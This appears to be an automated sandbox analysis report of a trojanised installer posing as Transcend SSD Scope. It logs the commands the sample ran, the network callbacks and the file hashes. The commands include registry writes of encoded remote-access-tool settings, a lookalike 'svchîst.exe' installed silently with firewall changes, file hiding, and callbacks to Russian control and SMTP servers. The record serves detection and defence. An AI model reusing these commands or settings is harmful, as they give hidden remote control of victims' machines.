d3c2f70617373776f72643e3c66726f6d5f656d61696c3e636f70797240636f7274636f6d2e6f6e6c696e653c2f66726f6d5f656d61696c3e3c7573655f746c733e747275653c2f7573655f746c733e3c656d61696c3e636f7274636f6d4079616e6465782e72753c2f656d61696c3e3c7375626a6563743e25555345524e414d452525434f4d504e414d45255f254944253c2f7375626a6563743e3c746578743e25555345524e414d452525434f4d504e414d45255f254944253c2f746578743e3c2f736d74705f73657474696e67733e3c2f726d735f696e65745f69645f6e6f74696669636174696f6e3e0d0a /f

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Classes\.gz" /v General /t REG_BINARY /d efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c67656e6572616c5f73657474696e67732076657273696f6e3d223639313130223e3c706f72743e353635303c2f706f72743e3c686964655f747261795f69636f6e5f706f7075705f6d656e753e747275653c2f686964655f747261795f69636f6e5f706f7075705f6d656e753e3c747261795f6d656e755f686964655f73746f703e747275653c2f747261795f6d656e755f686964655f73746f703e3c6c616e67756167653e456e676c6973683c2f6c616e67756167653e3c63616c6c6261636b5f6175746f5f636f6e6e6563743e747275653c2f63616c6c6261636b5f6175746f5f636f6e6e6563743e3c63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e36303c2f63616c6c6261636b5f636f6e6e6563745f696e74657276616c3e3c70617373776f72645f646174613e3765753976447778394b413d3c2f70617373776f72645f646174613e3c70726f746563745f63616c6c6261636b5f73657474696e67733e747275653c2f70726f746563745f63616c6c6261636b5f73657474696e67733e3c70726f746563745f696e65745f69645f73657474696e67733e747275653c2f70726f746563745f696e65745f69645f73657474696e67733e3c7573655f6c65676163795f636170747572653e66616c73653c2f7573655f6c65676163795f636170747572653e3c646f5f6e6f745f636170747572655f7264703e747275653c2f646f5f6e6f745f636170747572655f7264703e3c7573655f69705f765f363e747275653c2f7573655f69705f765f363e3c6c6f675f7573653e66616c73653c2f6c6f675f7573653e3c636861745f636c69656e745f73657474696e67733e3c2f636861745f636c69656e745f73657474696e67733e3c617574685f6b65795f737472696e673e3c2f617574685f6b65795f737472696e673e3c7369645f69643e34343034332e393930353632383831393c2f7369645f69643e3c6e6f746966795f73686f775f70616e656c3e66616c73653c2f6e6f746966795f73686f775f70616e656c3e3c6e6f746966795f6368616e67655f747261795f69636f6e3e747275653c2f6e6f746966795f6368616e67655f747261795f69636f6e3e3c6e6f746966795f62616c6c6f6e5f68696e743e66616c73653c2f6e6f746966795f62616c6c6f6e5f68696e743e3c6e6f746966795f706c61795f736f756e643e66616c73653c2f6e6f746966795f706c61795f736f756e643e3c6e6f746966795f70616e656c5f783e2d313c2f6e6f746966795f70616e656c5f783e3c6e6f746966795f70616e656c5f793e2d313c2f6e6f746966795f70616e656c5f793e3c70726f78795f73657474696e67733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a7877636d39346556397a5a5852306157356e637942325a584a7a61573975505349324f5445784d43492b5048567a5a563977636d39346554356d5957787a5a54777664584e6c5833427962336835506a7877636d3934655639306558426c506a41384c33427962336835583352356347552b504768766333512b5043396f62334e30506a787762334a30506a67774f4441384c334276636e512b5047356c5a575266595856306144356d5957787a5a547776626d566c5a4639686458526f506a787564473173583246316447672b5a6d4673633255384c32353062577866595856306144343864584e6c636d35686257552b5043393163325679626d46745a5434386347467a63336476636d512b5043397759584e7a643239795a4434385a47397459576c75506a77765a47397459576c75506a777663484a7665486c666332563064476c755a334d2b44516f3d3c2f70726f78795f73657474696e67733e3c6164646974696f6e616c3e3c2f6164646974696f6e616c3e3c64697361626c655f696e7465726e65745f69643e66616c73653c2f64697361626c655f696e7465726e65745f69643e3c736166655f6d6f64655f7365743e66616c73653c2f736166655f6d6f64655f7365743e3c73686f775f69645f6e6f74696669636174696f6e3e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e3e3c73686f775f69645f6e6f74696669636174696f6e5f726571756573743e66616c73653c2f73686f775f69645f6e6f74696669636174696f6e5f726571756573743e3c696e746567726174655f6669726577616c6c5f61745f737461727475703e747275653c2f696e746567726174655f6669726577616c6c5f61745f737461727475703e3c2f67656e6572616c5f73657474696e67733e0d0a /f

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Classes\.gz" /v Security /t REG_BINARY /d efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c73656375726974795f73657474696e67732076657273696f6e3d223639313130223e3c77696e646f77735f73656375726974793e3c2f77696e646f77735f73656375726974793e3c73696e676c655f70617373776f72645f686173683e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f73696e676c655f70617373776f72645f686173683e3c6d795f757365725f6163636573735f6c6973743e3c757365725f6163636573735f6c6973743e3c757365725f6163636573733e3c7369643e7b31384637453930342d374243392d344539302d413043382d4245463430384630464543427d3c2f7369643e3c757365725f6e616d653e41646d696e3c2f757365725f6e616d653e3c70617373776f72643e42343235324639423241323034344331463444413230414533413631444338343943343337453843334139453539444530433733304441443832453445314245353441324337313137463442413231453545344133384343443030304243323743313641333331333436304637413037393139414435354444373838394135363c2f70617373776f72643e3c6163636573735f6d61736b3e3935393c2f6163636573735f6d61736b3e3c6163746976653e747275653c2f6163746976653e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c2f757365725f6163636573733e3c2f757365725f6163636573735f6c6973743e3c2f6d795f757365725f6163636573735f6c6973743e3c69705f66696c7465725f747970653e323c2f69705f66696c7465725f747970653e3c69705f626c61636b5f6c6973743e3c2f69705f626c61636b5f6c6973743e3c69705f77686974655f6c6973743e3c2f69705f77686974655f6c6973743e3c617574685f6b696e643e373c2f617574685f6b696e643e3c6f74705f656e61626c653e66616c73653c2f6f74705f656e61626c653e3c6f74705f707269766174655f6b65793e3c2f6f74705f707269766174655f6b65793e3c6f74705f71725f7365637265743e3c2f6f74705f71725f7365637265743e3c757365725f7065726d697373696f6e735f61736b3e66616c73653c2f757365725f7065726d697373696f6e735f61736b3e3c757365725f7065726d697373696f6e735f696e74657276616c3e31303030303c2f757365725f7065726d697373696f6e735f696e74657276616c3e3c757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e66616c73653c2f757365725f7065726d697373696f6e735f616c6c6f775f64656661756c743e3c757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e66616c73653c2f757365725f7065726d697373696f6e735f6f6e6c795f69665f757365725f6c6f676765645f6f6e3e3c64697361626c655f72656d6f74655f636f6e74726f6c3e66616c73653c2f64697361626c655f72656d6f74655f636f6e74726f6c3e3c64697361626c655f72656d6f74655f73637265656e3e66616c73653c2f64697361626c655f72656d6f74655f73637265656e3e3c64697361626c655f66696c655f7472616e736665723e66616c73653c2f64697361626c655f66696c655f7472616e736665723e3c64697361626c655f72656469726563743e66616c73653c2f64697361626c655f72656469726563743e3c64697361626c655f74656c6e65743e66616c73653c2f64697361626c655f74656c6e65743e3c64697361626c655f72656d6f74655f657865637574653e66616c73653c2f64697361626c655f72656d6f74655f657865637574653e3c64697361626c655f7461736b5f6d616e616765723e66616c73653c2f64697361626c655f7461736b5f6d616e616765723e3c64697361626c655f73687574646f776e3e66616c73653c2f64697361626c655f73687574646f776e3e3c64697361626c655f72656d6f74655f757067726164653e66616c73653c2f64697361626c655f72656d6f74655f757067726164653e3c64697361626c655f707265766965775f636170747572653e66616c73653c2f64697361626c655f707265766965775f636170747572653e3c64697361626c655f6465766963655f6d616e616765723e66616c73653c2f64697361626c655f6465766963655f6d616e616765723e3c64697361626c655f636861743e66616c73653c2f64697361626c655f636861743e3c64697361626c655f73637265656e5f7265636f72643e66616c73653c2f64697361626c655f73637265656e5f7265636f72643e3c64697361626c655f61765f636170747572653e66616c73653c2f64697361626c655f61765f636170747572653e3c64697361626c655f73656e645f6d6573736167653e66616c73653c2f64697361626c655f73656e645f6d6573736167653e3c64697361626c655f72656769737472793e66616c73653c2f64697361626c655f72656769737472793e3c64697361626c655f61765f636861743e66616c73653c2f64697361626c655f61765f636861743e3c64697361626c655f72656d6f74655f73657474696e67733e66616c73653c2f64697361626c655f72656d6f74655f73657474696e67733e3c64697361626c655f72656d6f74655f7072696e74696e673e66616c73653c2f64697361626c655f72656d6f74655f7072696e74696e673e3c64697361626c655f7264703e66616c73653c2f64697361626c655f7264703e3c637573746f6d5f7365727665725f6c6973743e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787a5a584a325a584a6659323975626d566a6446396a623235305a58683049485a6c636e4e7062323439496a59354d544577496a3438636d317a58334e6c636e5a6c636e4d76506a777663325679646d567958324e76626d356c5933526659323975644756346444344e43673d3d3c2f637573746f6d5f7365727665725f6c6973743e3c73656c65637465645f637573746f6d5f7365727665725f69643e3c2f73656c65637465645f637573746f6d5f7365727665725f69643e3c637573746f6d5f7365727665725f6163636573733e3737752f5044393462577767646d567963326c76626a30694d5334774969426c626d4e765a476c755a7a3069565652474c546769507a344e436a787962584e6659574e7349485a6c636e4e7062323439496a59354d544577496a3438636d317a5832466a5a584d76506a786c626d4669624756666157356f5a584a7064443530636e566c5043396c626d4669624756666157356f5a584a70644434384c334a74633139685932772b44516f3d3c2f637573746f6d5f7365727665725f6163636573733e3c2f73656375726974795f73657474696e67733e0d0a /f

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1

C:\Windows\SysWOW64\reg.exe

reg delete "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\installer 20.0.37920.2020" /f

C:\Windows\SysWOW64\drivers\svchîst.exe

"C:\Windows\System32\drivers\svchîst.exe" /silentinstall

C:\Windows\SysWOW64\drivers\svchîst.exe

"C:\Windows\System32\drivers\svchîst.exe" /firewall

C:\Windows\SysWOW64\drivers\svchîst.exe

"C:\Windows\System32\drivers\svchîst.exe" /start

C:\Windows\SysWOW64\drivers\svchîst.exe

"C:\Windows\SysWOW64\drivers\svchîst.exe"

C:\Windows\SysWOW64\attrib.exe

attrib +h +s "C:\Windows\System32\idfgvgjnghcdfb.reg"

C:\Windows\SysWOW64\attrib.exe

attrib +h +s "svchîst.exe"

C:\Windows\SysWOW64\attrib.exe

attrib -h -s "install.exe"

C:\Windows\SysWOW64\attrib.exe

attrib -h -s "install.cmd"

C:\Windows\SysWOW64\drivers\svchîst.exe

C:\Windows\SysWOW64\drivers\svchîst.exe -firewall

Network

Country Destination Domain Proto
US 8.8.8.8:53 smtp.spaceweb.ru udp
RU 77.222.41.133:25 smtp.spaceweb.ru tcp
US 8.8.8.8:53 rms-server.tektonit.ru udp
RU 95.213.205.83:5655 rms-server.tektonit.ru tcp
RU 77.223.124.212:5655 tcp

Files

memory/1964-54-0x0000000075DB1000-0x0000000075DB3000-memory.dmp

memory/1388-56-0x0000000000000000-mapping.dmp

memory/952-55-0x0000000000000000-mapping.dmp

memory/1728-57-0x0000000000000000-mapping.dmp

memory/1256-58-0x0000000000000000-mapping.dmp

memory/1072-59-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\Transcend SSD Scope\4.0\setup.exe

MD5 374fd6789cf52f0c651fff25163416f4
SHA1 729318e1cf30f3ceac280ba4bbbc55da0f6a31d8
SHA256 cb068061b0564d2d1050bcb5789e23794678de4453fd68c130b3f38e2da795bb
SHA512 c1ebde120894de031da5395ed2c57c07ce4a5407437c285e751b713fb4daae1ff72eeb1217ad0d0072aaff9bf02e38e13926edc5329a0e5c261d87d1c172ac20

\Users\Admin\AppData\Local\Temp\Transcend SSD Scope\4.0\setup.exe

MD5 374fd6789cf52f0c651fff25163416f4
SHA1 729318e1cf30f3ceac280ba4bbbc55da0f6a31d8
SHA256 cb068061b0564d2d1050bcb5789e23794678de4453fd68c130b3f38e2da795bb
SHA512 c1ebde120894de031da5395ed2c57c07ce4a5407437c285e751b713fb4daae1ff72eeb1217ad0d0072aaff9bf02e38e13926edc5329a0e5c261d87d1c172ac20

\Users\Admin\AppData\Local\Temp\Transcend SSD Scope\4.0\setup.exe

MD5 374fd6789cf52f0c651fff25163416f4
SHA1 729318e1cf30f3ceac280ba4bbbc55da0f6a31d8
SHA256 cb068061b0564d2d1050bcb5789e23794678de4453fd68c130b3f38e2da795bb
SHA512 c1ebde120894de031da5395ed2c57c07ce4a5407437c285e751b713fb4daae1ff72eeb1217ad0d0072aaff9bf02e38e13926edc5329a0e5c261d87d1c172ac20

\Users\Admin\AppData\Local\Temp\Transcend SSD Scope\4.0\setup.exe

MD5 374fd6789cf52f0c651fff25163416f4
SHA1 729318e1cf30f3ceac280ba4bbbc55da0f6a31d8
SHA256 cb068061b0564d2d1050bcb5789e23794678de4453fd68c130b3f38e2da795bb
SHA512 c1ebde120894de031da5395ed2c57c07ce4a5407437c285e751b713fb4daae1ff72eeb1217ad0d0072aaff9bf02e38e13926edc5329a0e5c261d87d1c172ac20

memory/2032-64-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\Transcend SSD Scope\4.0\setup.exe

MD5 374fd6789cf52f0c651fff25163416f4
SHA1 729318e1cf30f3ceac280ba4bbbc55da0f6a31d8
SHA256 cb068061b0564d2d1050bcb5789e23794678de4453fd68c130b3f38e2da795bb
SHA512 c1ebde120894de031da5395ed2c57c07ce4a5407437c285e751b713fb4daae1ff72eeb1217ad0d0072aaff9bf02e38e13926edc5329a0e5c261d87d1c172ac20

C:\Users\Admin\AppData\Local\Temp\Transcend SSD Scope\4.0\setup.exe

MD5 374fd6789cf52f0c651fff25163416f4
SHA1 729318e1cf30f3ceac280ba4bbbc55da0f6a31d8
SHA256 cb068061b0564d2d1050bcb5789e23794678de4453fd68c130b3f38e2da795bb
SHA512 c1ebde120894de031da5395ed2c57c07ce4a5407437c285e751b713fb4daae1ff72eeb1217ad0d0072aaff9bf02e38e13926edc5329a0e5c261d87d1c172ac20

memory/2032-69-0x0000000000400000-0x000000000045C000-memory.dmp

memory/1036-68-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\is-FEERC.tmp\setup.tmp

MD5 3f157c5cc57b499bffd5dd720edef9e9
SHA1 6eb3096b7db925f925662480ce45f73b90f18c7b
SHA256 02d21270fef479c71d075029f9d90d8ee1433f8237b56c033d95d87b694c3c10
SHA512 dc66bfe6ea1168ba3c4449fb1d482087030e5f08396858472c71b5bfbe9a56aa264d0d405ff5b46ea2d23c8f2bc61fbe450e3ccc6fa689b5756f7ad7b1b204fe

memory/1632-72-0x0000000000000000-mapping.dmp

memory/1832-73-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\is-FEERC.tmp\setup.tmp

MD5 3f157c5cc57b499bffd5dd720edef9e9
SHA1 6eb3096b7db925f925662480ce45f73b90f18c7b
SHA256 02d21270fef479c71d075029f9d90d8ee1433f8237b56c033d95d87b694c3c10
SHA512 dc66bfe6ea1168ba3c4449fb1d482087030e5f08396858472c71b5bfbe9a56aa264d0d405ff5b46ea2d23c8f2bc61fbe450e3ccc6fa689b5756f7ad7b1b204fe

memory/1900-76-0x0000000000000000-mapping.dmp

memory/2036-78-0x0000000000000000-mapping.dmp

C:\Windows\SysWOW64\drivers\install.exe

MD5 1cd9ee0406b9a04672fdd385ca7631ce
SHA1 5b3b49cd7906676ad46a7b7d192967df6c9ea505
SHA256 2867d9d82ad10a29d36b2bee57993db95246b8fc90824d03d04f6e91b2eb34e8
SHA512 367fd8fb8e0d8215febed8c8fd223b35758acd82bcb678109068bb34d588d331ade1309e4c7d76a57014dab55e0e629127cc4229f2f8ea1ddc49b228ac6a61a7

\Windows\SysWOW64\drivers\install.exe

MD5 1cd9ee0406b9a04672fdd385ca7631ce
SHA1 5b3b49cd7906676ad46a7b7d192967df6c9ea505
SHA256 2867d9d82ad10a29d36b2bee57993db95246b8fc90824d03d04f6e91b2eb34e8
SHA512 367fd8fb8e0d8215febed8c8fd223b35758acd82bcb678109068bb34d588d331ade1309e4c7d76a57014dab55e0e629127cc4229f2f8ea1ddc49b228ac6a61a7

C:\Windows\SysWOW64\drivers\install.exe

MD5 1cd9ee0406b9a04672fdd385ca7631ce
SHA1 5b3b49cd7906676ad46a7b7d192967df6c9ea505
SHA256 2867d9d82ad10a29d36b2bee57993db95246b8fc90824d03d04f6e91b2eb34e8
SHA512 367fd8fb8e0d8215febed8c8fd223b35758acd82bcb678109068bb34d588d331ade1309e4c7d76a57014dab55e0e629127cc4229f2f8ea1ddc49b228ac6a61a7

memory/1124-82-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\$inst\2.tmp

MD5 8708699d2c73bed30a0a08d80f96d6d7
SHA1 684cb9d317146553e8c5269c8afb1539565f4f78
SHA256 a32e0a83001d2c5d41649063217923dac167809cab50ec5784078e41c9ec0f0f
SHA512 38ece3e441cc5d8e97781801d5b19bdede6065a0a50f7f87337039edeeb4a22ad0348e9f5b5542b26236037dd35d0563f62d7f4c4f991c51020552cfae03b264

memory/548-86-0x0000000000000000-mapping.dmp

memory/1504-87-0x0000000000000000-mapping.dmp

memory/1840-88-0x0000000000000000-mapping.dmp

memory/1212-89-0x0000000000000000-mapping.dmp

memory/1968-90-0x0000000000000000-mapping.dmp

memory/556-92-0x0000000000000000-mapping.dmp

memory/1952-91-0x0000000000000000-mapping.dmp

memory/2020-93-0x0000000000000000-mapping.dmp

memory/1620-94-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\is-TNVJN.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

\Users\Admin\AppData\Local\Temp\is-TNVJN.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

C:\Windows\SysWOW64\drivers\svchîst.exe

MD5 a6fcc7dd9a6e029c921555b1de6fd586
SHA1 a889c079a86d600896e14973ba5775b6b1f6ac60
SHA256 4070e977823d74478aec248862302063918fda16b57f2c3b561018605bfbf4fe
SHA512 6c0e94c53c90a6963587bd9ca88aff20bdcc3aad4e7ad25ef2192e278fd9cfc727b7b1a544149ec5d4d91697e90d507bebf6691b8851a976802ad9282af1fddb

\Windows\SysWOW64\drivers\svchîst.exe

MD5 a6fcc7dd9a6e029c921555b1de6fd586
SHA1 a889c079a86d600896e14973ba5775b6b1f6ac60
SHA256 4070e977823d74478aec248862302063918fda16b57f2c3b561018605bfbf4fe
SHA512 6c0e94c53c90a6963587bd9ca88aff20bdcc3aad4e7ad25ef2192e278fd9cfc727b7b1a544149ec5d4d91697e90d507bebf6691b8851a976802ad9282af1fddb

memory/1016-99-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\is-TNVJN.tmp\idp.dll

MD5 461c328642b26ff2a48625c3a54c6329
SHA1 757c2f0a68df81c6ca86ec66a60868820d9445b3
SHA256 f2a19a4d71bbdfdf0ac2b0b4bfb1f07507d7dfa11d2942f215a5768a655e4835
SHA512 bbfc6761660c79e2fa5fa7970625820cf3e5c5af69ac4b5fd65ddb15883c54f1649ea85365b72945d5985e93783ee3f14d2fd2d8582fdcb175bfc13d7b41293d

C:\Windows\SysWOW64\drivers\svchîst.exe

MD5 a6fcc7dd9a6e029c921555b1de6fd586
SHA1 a889c079a86d600896e14973ba5775b6b1f6ac60
SHA256 4070e977823d74478aec248862302063918fda16b57f2c3b561018605bfbf4fe
SHA512 6c0e94c53c90a6963587bd9ca88aff20bdcc3aad4e7ad25ef2192e278fd9cfc727b7b1a544149ec5d4d91697e90d507bebf6691b8851a976802ad9282af1fddb

\Users\Admin\AppData\Local\Temp\is-TNVJN.tmp\isxdl.dll

MD5 48ad1a1c893ce7bf456277a0a085ed01
SHA1 803997ef17eedf50969115c529a2bf8de585dc91
SHA256 b0cc4697b2fd1b4163fddca2050fc62a9e7d221864f1bd11e739144c90b685b3
SHA512 7c9e7fe9f00c62cccb5921cb55ba0dd96a0077ad52962473c1e79cda1fd9aa101129637043955703121443e1f8b6b2860cd4dfdb71052b20a322e05deed101a4

C:\Windows\SysWOW64\drivers\ssleay32.dll

MD5 5c268ca919854fc22d85f916d102ee7f
SHA1 0957cf86e0334673eb45945985b5c033b412be0e
SHA256 1f4b3efc919af1106f348662ee9ad95ab019058ff502e3d68e1b5f7abff91b56
SHA512 76d0abad1d7d0856ec1b8e598b05a2a6eece220ea39d74e7f6278a4219e22c75b7f618160ce41810daa57d5d4d534afd78f5cc1bd6de927dbb6a551aca2f8310

\Windows\SysWOW64\drivers\libeay32.dll

MD5 4cb2e1b9294ddae1bf7dcaaf42b365d1
SHA1 a225f53a8403d9b73d77bcbb075194520cce5a14
SHA256 a8124500cae0aba3411428c2c6df2762ea11cc11c312abed415d3f3667eb6884
SHA512 46cf4abf9121c865c725ca159df71066e0662595915d653914e4ec047f94e2ab3823f85c9e0e0c1311304c460c90224bd3141da62091c733dcaa5dccf64c04bb

\Windows\SysWOW64\drivers\ssleay32.dll

MD5 5c268ca919854fc22d85f916d102ee7f
SHA1 0957cf86e0334673eb45945985b5c033b412be0e
SHA256 1f4b3efc919af1106f348662ee9ad95ab019058ff502e3d68e1b5f7abff91b56
SHA512 76d0abad1d7d0856ec1b8e598b05a2a6eece220ea39d74e7f6278a4219e22c75b7f618160ce41810daa57d5d4d534afd78f5cc1bd6de927dbb6a551aca2f8310

C:\Windows\SysWOW64\drivers\libeay32.dll

MD5 4cb2e1b9294ddae1bf7dcaaf42b365d1
SHA1 a225f53a8403d9b73d77bcbb075194520cce5a14
SHA256 a8124500cae0aba3411428c2c6df2762ea11cc11c312abed415d3f3667eb6884
SHA512 46cf4abf9121c865c725ca159df71066e0662595915d653914e4ec047f94e2ab3823f85c9e0e0c1311304c460c90224bd3141da62091c733dcaa5dccf64c04bb

memory/2032-108-0x0000000000400000-0x000000000045C000-memory.dmp

\Windows\SysWOW64\drivers\svchîst.exe

MD5 a6fcc7dd9a6e029c921555b1de6fd586
SHA1 a889c079a86d600896e14973ba5775b6b1f6ac60
SHA256 4070e977823d74478aec248862302063918fda16b57f2c3b561018605bfbf4fe
SHA512 6c0e94c53c90a6963587bd9ca88aff20bdcc3aad4e7ad25ef2192e278fd9cfc727b7b1a544149ec5d4d91697e90d507bebf6691b8851a976802ad9282af1fddb

C:\Windows\SysWOW64\drivers\svchîst.exe

MD5 a6fcc7dd9a6e029c921555b1de6fd586
SHA1 a889c079a86d600896e14973ba5775b6b1f6ac60
SHA256 4070e977823d74478aec248862302063918fda16b57f2c3b561018605bfbf4fe
SHA512 6c0e94c53c90a6963587bd9ca88aff20bdcc3aad4e7ad25ef2192e278fd9cfc727b7b1a544149ec5d4d91697e90d507bebf6691b8851a976802ad9282af1fddb

memory/932-110-0x0000000000000000-mapping.dmp

\Windows\SysWOW64\drivers\ssleay32.dll

MD5 5c268ca919854fc22d85f916d102ee7f
SHA1 0957cf86e0334673eb45945985b5c033b412be0e
SHA256 1f4b3efc919af1106f348662ee9ad95ab019058ff502e3d68e1b5f7abff91b56
SHA512 76d0abad1d7d0856ec1b8e598b05a2a6eece220ea39d74e7f6278a4219e22c75b7f618160ce41810daa57d5d4d534afd78f5cc1bd6de927dbb6a551aca2f8310

\Windows\SysWOW64\drivers\libeay32.dll

MD5 4cb2e1b9294ddae1bf7dcaaf42b365d1
SHA1 a225f53a8403d9b73d77bcbb075194520cce5a14
SHA256 a8124500cae0aba3411428c2c6df2762ea11cc11c312abed415d3f3667eb6884
SHA512 46cf4abf9121c865c725ca159df71066e0662595915d653914e4ec047f94e2ab3823f85c9e0e0c1311304c460c90224bd3141da62091c733dcaa5dccf64c04bb

\Windows\SysWOW64\drivers\svchîst.exe

MD5 a6fcc7dd9a6e029c921555b1de6fd586
SHA1 a889c079a86d600896e14973ba5775b6b1f6ac60
SHA256 4070e977823d74478aec248862302063918fda16b57f2c3b561018605bfbf4fe
SHA512 6c0e94c53c90a6963587bd9ca88aff20bdcc3aad4e7ad25ef2192e278fd9cfc727b7b1a544149ec5d4d91697e90d507bebf6691b8851a976802ad9282af1fddb

memory/984-116-0x0000000000000000-mapping.dmp

C:\Windows\SysWOW64\drivers\svchîst.exe

MD5 a6fcc7dd9a6e029c921555b1de6fd586
SHA1 a889c079a86d600896e14973ba5775b6b1f6ac60
SHA256 4070e977823d74478aec248862302063918fda16b57f2c3b561018605bfbf4fe
SHA512 6c0e94c53c90a6963587bd9ca88aff20bdcc3aad4e7ad25ef2192e278fd9cfc727b7b1a544149ec5d4d91697e90d507bebf6691b8851a976802ad9282af1fddb

\??\PIPE\wkssvc

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

\Windows\SysWOW64\drivers\ssleay32.dll

MD5 5c268ca919854fc22d85f916d102ee7f
SHA1 0957cf86e0334673eb45945985b5c033b412be0e
SHA256 1f4b3efc919af1106f348662ee9ad95ab019058ff502e3d68e1b5f7abff91b56
SHA512 76d0abad1d7d0856ec1b8e598b05a2a6eece220ea39d74e7f6278a4219e22c75b7f618160ce41810daa57d5d4d534afd78f5cc1bd6de927dbb6a551aca2f8310

\Windows\SysWOW64\drivers\libeay32.dll

MD5 4cb2e1b9294ddae1bf7dcaaf42b365d1
SHA1 a225f53a8403d9b73d77bcbb075194520cce5a14
SHA256 a8124500cae0aba3411428c2c6df2762ea11cc11c312abed415d3f3667eb6884
SHA512 46cf4abf9121c865c725ca159df71066e0662595915d653914e4ec047f94e2ab3823f85c9e0e0c1311304c460c90224bd3141da62091c733dcaa5dccf64c04bb

C:\Windows\SysWOW64\drivers\svchîst.exe

MD5 a6fcc7dd9a6e029c921555b1de6fd586
SHA1 a889c079a86d600896e14973ba5775b6b1f6ac60
SHA256 4070e977823d74478aec248862302063918fda16b57f2c3b561018605bfbf4fe
SHA512 6c0e94c53c90a6963587bd9ca88aff20bdcc3aad4e7ad25ef2192e278fd9cfc727b7b1a544149ec5d4d91697e90d507bebf6691b8851a976802ad9282af1fddb

\Windows\SysWOW64\drivers\libeay32.dll

MD5 4cb2e1b9294ddae1bf7dcaaf42b365d1
SHA1 a225f53a8403d9b73d77bcbb075194520cce5a14
SHA256 a8124500cae0aba3411428c2c6df2762ea11cc11c312abed415d3f3667eb6884
SHA512 46cf4abf9121c865c725ca159df71066e0662595915d653914e4ec047f94e2ab3823f85c9e0e0c1311304c460c90224bd3141da62091c733dcaa5dccf64c04bb

\Windows\SysWOW64\drivers\ssleay32.dll

MD5 5c268ca919854fc22d85f916d102ee7f
SHA1 0957cf86e0334673eb45945985b5c033b412be0e
SHA256 1f4b3efc919af1106f348662ee9ad95ab019058ff502e3d68e1b5f7abff91b56
SHA512 76d0abad1d7d0856ec1b8e598b05a2a6eece220ea39d74e7f6278a4219e22c75b7f618160ce41810daa57d5d4d534afd78f5cc1bd6de927dbb6a551aca2f8310

memory/1948-126-0x0000000000000000-mapping.dmp

C:\Windows\SysWOW64\idfgvgjnghcdfb.reg

MD5 7b5e1d30e89e0ef1c86fecb977131673
SHA1 78df83f3256df2efbe483d182d4cc13afe99be2b
SHA256 b114302cfede0f574362385c4949dde34c544b5213a239908299588f00b0bd80
SHA512 eae8f24f30b8dac2d0944fb702aca9c6ca30a5d3ffb6a4191afec47af1f59a50bbaa00d11b07976f485c58839f1927695655a69ff81807ca123026dd2e84b719

memory/1784-128-0x0000000000000000-mapping.dmp

memory/1600-129-0x0000000000000000-mapping.dmp

memory/1256-130-0x0000000000000000-mapping.dmp

C:\Windows\SysWOW64\drivers\svchîst.exe

MD5 a6fcc7dd9a6e029c921555b1de6fd586
SHA1 a889c079a86d600896e14973ba5775b6b1f6ac60
SHA256 4070e977823d74478aec248862302063918fda16b57f2c3b561018605bfbf4fe
SHA512 6c0e94c53c90a6963587bd9ca88aff20bdcc3aad4e7ad25ef2192e278fd9cfc727b7b1a544149ec5d4d91697e90d507bebf6691b8851a976802ad9282af1fddb

memory/628-131-0x0000000000000000-mapping.dmp

\Windows\SysWOW64\drivers\libeay32.dll

MD5 4cb2e1b9294ddae1bf7dcaaf42b365d1
SHA1 a225f53a8403d9b73d77bcbb075194520cce5a14
